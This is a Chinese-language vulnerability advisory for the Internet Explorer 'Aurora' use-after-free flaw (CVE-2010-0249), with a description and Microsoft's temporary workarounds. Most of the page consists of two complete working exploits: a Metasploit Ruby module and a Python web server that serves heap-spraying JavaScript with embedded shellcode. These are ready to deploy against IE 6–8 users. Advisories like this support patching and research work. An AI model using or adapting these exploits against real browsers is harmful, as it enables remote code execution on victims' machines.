受影响系统:
Microsoft Internet Explorer 8.0
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
描述:
BUGTRAQ ID: 37815
CVE ID: CVE-2010-0249
Microsoft IE是微软Windows操作系统自带的浏览器软件。
IE在处理非法的事件操作时存在内存破坏漏洞,由于在创建对象以后没有增加相应的访问记数,恶意的对象操作流程可能导致指针指向被释放后重使用的内存,远程攻击者可能利用此漏洞通过恶意操作内存并诱使用户访问恶意网页在用户系统上执行指令。
此漏洞是一个0day漏洞,证实影响IE 6/7/8版本,已被利用来攻击一些大型公司的网络,随着技术细节和可用攻击代码的公开极有可能被利用来执行挂马攻击。目前微软已经发布了相关的安全公告,提供了临时解决方案,但还没有提供补丁,强烈建议按照临时解决方案中的建议采取措施。
<*来源:Microsoft
链接:http://blogs.technet.com/msrc/archive/2010/01/14/security-advisory-979352.aspx
http://secunia.com/advisories/38209/
http://www.kb.cert.org/vuls/id/492515
http://extraexploit.blogspot.com/2010/01/iexplorer-0day-cve-2010-0249.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
##
# $Id: ie_aurora.rb 8140 2010-01-16 01:00:01Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require ‘msf/core’
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "6.0",
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => nil, # no way to test without just trying it
})
def initialize(info = {})
super(update_info(info,
‘Name’ => ‘Microsoft Internet Explorer "Aurora" Memory Corruption’,
‘Description’ => %q{
This module exploits a memory corruption flaw in Internet Explorer. This
flaw was found in the wild and was a key component of the "Operation Aurora"
attacks that lead to the compromise of a number of high profile companies. The
exploit code is a direct port of the public sample published to the Wepawet
malware analysis site. The technique used by this module is currently identical
to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
},
‘License’ => MSF_LICENSE,
‘Author’ =>
[
‘unknown’,
‘hdm’ # Metasploit port
],
‘Version’ => ‘$Revision: 8140 $’,
‘References’ =>
[
[‘CVE’, ‘2010-0249’],
[‘OSVDB’, ‘61697’],
[‘URL’, ‘http://www.microsoft.com/technet/security/advisory/979352.mspx’],
[‘URL’, ‘http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js’]
],
‘DefaultOptions’ =>
{
‘EXITFUNC’ => ‘process’,
},
‘Payload’ =>
{
‘Space’ => 1000,
‘BadChars’ => "\x00",
‘Compat’ =>
{
‘ConnectionType’ => ‘-find’,
},
‘StackAdjustment’ => -3500,
},
‘Platform’ => ‘win’,
‘Targets’ =>
[
[ ‘Automatic’, { }],
],
‘DisclosureDate’ => ‘Jan 14 2009’, # wepawet sample
‘DefaultTarget’ => 0))
end
def on_request_uri(cli, request)
if (request.uri.match(/\.gif/i))
data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
send_response(cli, data, { ‘Content-Type’ => ‘image/gif’ })
return
end
var_memory = rand_text_alpha(rand(100) + 1)
var_boom = rand_text_alpha(rand(100) + 1)
var_x1 = rand_text_alpha(rand(100) + 1)
var_e1 = rand_text_alpha(rand(100) + 1)
var_e2 = rand_text_alpha(rand(100) + 1)
var_comment = rand_text_alpha(rand(100) + 1);
var_abc = rand_text_alpha(3);
var_ev1 = rand_text_alpha(rand(100) + 1)
var_ev2 = rand_text_alpha(rand(100) + 1)
var_sp1 = rand_text_alpha(rand(100) + 1)
var_unescape = rand_text_alpha(rand(100) + 1)
var_shellcode = rand_text_alpha(rand(100) + 1)
var_spray = rand_text_alpha(rand(100) + 1)
var_start = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(100) + 1)
rand_html = rand_text_english(rand(400) + 500)
html = %Q|<html>
<head>
<script>
var #{var_comment} = "COMMENT";
var #{var_x1} = new Array();
for (i = 0; i < 200; i ++ ){
#{var_x1}[i] = document.createElement(#{var_comment});
#{var_x1}[i].data = "#{var_abc}";
};
var #{var_e1} = null;
var #{var_memory} = new Array();
var #{var_unescape} = unescape;
function #{var_boom}() {
var #{var_shellcode} = #{var_unescape}( ‘#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}’);
var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );
for(#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
}
function #{var_ev1}(evt){
#{var_boom}();
#{var_e1} = document.createEventObject(evt);
document.getElementById("#{var_sp1}").innerHTML = "";
window.setInterval(#{var_ev2}, 50);
}
function #{var_ev2}(){
p = "\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d
\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d
\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
for (i = 0; i < #{var_x1}.length; i ++ ){
#{var_x1}[i].data = p;
}
var t = #{var_e1}.srcElement;
}
</script>
</head>
<body>
<span id="#{var_sp1}"><img src="#{get_resource}#{var_start}.gif" onload="#{var_ev1}(event)"></span></body></html>
</body>
</html>
|
print_status("Sending #{self.name} to client #{cli.peerhost}")
# Transmit the compressed response to the client
send_response(cli, html, { ‘Content-Type’ => ‘text/html’, ‘Pragma’ => ‘no-cache’ })
# Handle the payload
handler(cli)
end
end
http://www.exploit-db.com/exploits/11167
# Title: Internet Explorer Aurora Exploit
# EDB-ID: 11167
# CVE-ID: (CVE-2010-0249)
# OSVDB-ID: ()
# Author: Ahmed Obied
# Published: 2010-01-17
# Verified: yes
# Download Exploit Code
# Download N/A
#
# Author : Ahmed Obied (ahmed.obied@gmail.com)
#
# This program acts as a web server that generates an exploit to
# target a vulnerability (CVE-2010-0249) in Internet Explorer.
# The exploit was tested using Internet Explorer 6 on Windows XP SP2.
# The exploit’s payload spawns the calculator.
#
# Usage : python ie_aurora.py [port number]
#
import sys
import socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
class RequestHandler(BaseHTTPRequestHandler):
def convert_to_utf16(self, payload):
enc_payload = ”
for i in range(0, len(payload), 2):
num = 0
for j in range(0, 2):
num += (ord(payload[i + j]) & 0xff) << (j * 8)
enc_payload += ‘%%u%04x’ % num
return enc_payload
def get_payload(self):
# win32_exec – EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
# http://metasploit.com
payload = ‘\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73’
payload += ‘\x13\x6f\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e’
payload += ‘\x6f\x02\x3a\x4b\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a’
payload += ‘\x3a\x51\x4f\x03\x5a\x47\xe4\x36\x3a\x0f\x81\x33\x71\x97’
payload += ‘\xc3\x86\x71\x7a\x68\xc3\x7b\x03\x6e\xc0\x5a\xfa\x54\x56’
payload += ‘\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68\xe4\x0e\xfa\x85’
payload += ‘\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a\x6b\xc1’
payload += ‘\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85’
payload += ‘\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02’
payload += ‘\x3a\x66\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e’
payload += ‘\x07\x7c\x69\xec\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61’
payload += ‘\xd0\x62\x0c\x2c\xd4\x76\x0a\x02\xb1\x0e’
return self.convert_to_utf16(payload)
def get_exploit(self):
exploit = ”’
<html>
<head>
<script>
var obj, event_obj;
function spray_heap()
{
var chunk_size, payload, nopsled;
chunk_size = 0x80000;
payload = unescape("<PAYLOAD>");
nopsled = unescape("<NOP>");
while (nopsled.length < chunk_size)
nopsled += nopsled;
nopsled_len = chunk_size – (payload.length + 20);
nopsled = nopsled.substring(0, nopsled_len);
heap_chunks = new Array();
for (var i = 0 ; i < 200 ; i++)
heap_chunks[i] = nopsled + payload;
}
function initialize()
{
obj = new Array();
event_obj = null;
for (var i = 0; i < 200 ; i++ )
obj[i] = document.createElement("COMMENT");
}
function ev1(evt)
{
event_obj = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 1);
}
function ev2()
{
var data, tmp;
data = "";
tmp = unescape("%u0a0a%u0a0a");
for (var i = 0 ; i < 4 ; i++)
data += tmp;
for (i = 0 ; i < obj.length ; i++ ) {
obj[i].data = data;
}
event_obj.srcElement;
}
function check()
{
if (navigator.userAgent.indexOf("MSIE") == -1)
return false;
return true;
}
if (check()) {
initialize();
spray_heap();
}
else
window.location = ‘about:blank’
</script>
</head>
<body>
<span id="sp1">
<img src="aurora.gif" onload="ev1(event)">
</span>
</body>
</html>
”’
exploit = exploit.replace(‘<PAYLOAD>’, self.get_payload())
exploit = exploit.replace(‘<NOP>’, ‘%u0a0a%u0a0a’)
return exploit
def get_image(self):
content = ‘\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff’
content += ‘\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44’
content += ‘\x01\x00\x3b’
return content
def log_request(self, *args, **kwargs):
pass
def do_GET(self):
try:
if self.path == ‘/’:
print
print ‘[-] Incoming connection from %s’ % self.client_address[0]
self.send_response(200)
self.send_header(‘Content-Type’, ‘text/html’)
self.end_headers()
print ‘[-] Sending exploit to %s …’ % self.client_address[0]
self.wfile.write(self.get_exploit())
print ‘[-] Exploit sent to %s’ % self.client_address[0]
elif self.path == ‘/aurora.gif’:
self.send_response(200)
self.send_header(‘Content-Type’, ‘image/gif’)
self.end_headers()
self.wfile.write(self.get_image())
except:
print ‘[*] Error : an error has occured while serving the HTTP request’
print ‘[-] Exiting …’
sys.exit(-1)
def main():
if len(sys.argv) != 2:
print ‘Usage: %s [port number (between 1024 and 65535)]’ % sys.argv[0]
sys.exit(0)
try:
port = int(sys.argv[1])
if port < 1024 or port > 65535:
raise ValueError
try:
serv = HTTPServer((”, port), RequestHandler)
ip = socket.gethostbyname(socket.gethostname())
print ‘[-] Web server is running at http://%s:%d/’ % (ip, port)
try:
serv.serve_forever()
except:
print ‘[-] Exiting …’
except socket.error:
print ‘[*] Error : a socket error has occurred’
sys.exit(-1)
except ValueError:
print ‘[*] Error : an invalid port number was given’
sys.exit(-1)
if __name__ == ‘__main__’:
main()
建议:
临时解决方法:
* 对Internet Explorer 6 SP2或Internet Explorer 7启用DEP。
微软提供了一个自动化的工具为IE 6/7开启DEP,请到如下网址下载:
http://go.microsoft.com/?linkid=9668626
* 将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件和活动脚本之前进行提示。
* 将Internet 和本地Intranet安全区域设置设为“高”,以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。
厂商补丁:
Microsoft
———
目前厂商已经发布了漏洞通告但还没有提供漏洞补丁,建议按通告中的临时解决方案处理:
http://www.microsoft.com/technet/security/advisory/979352.mspx
0 条评论。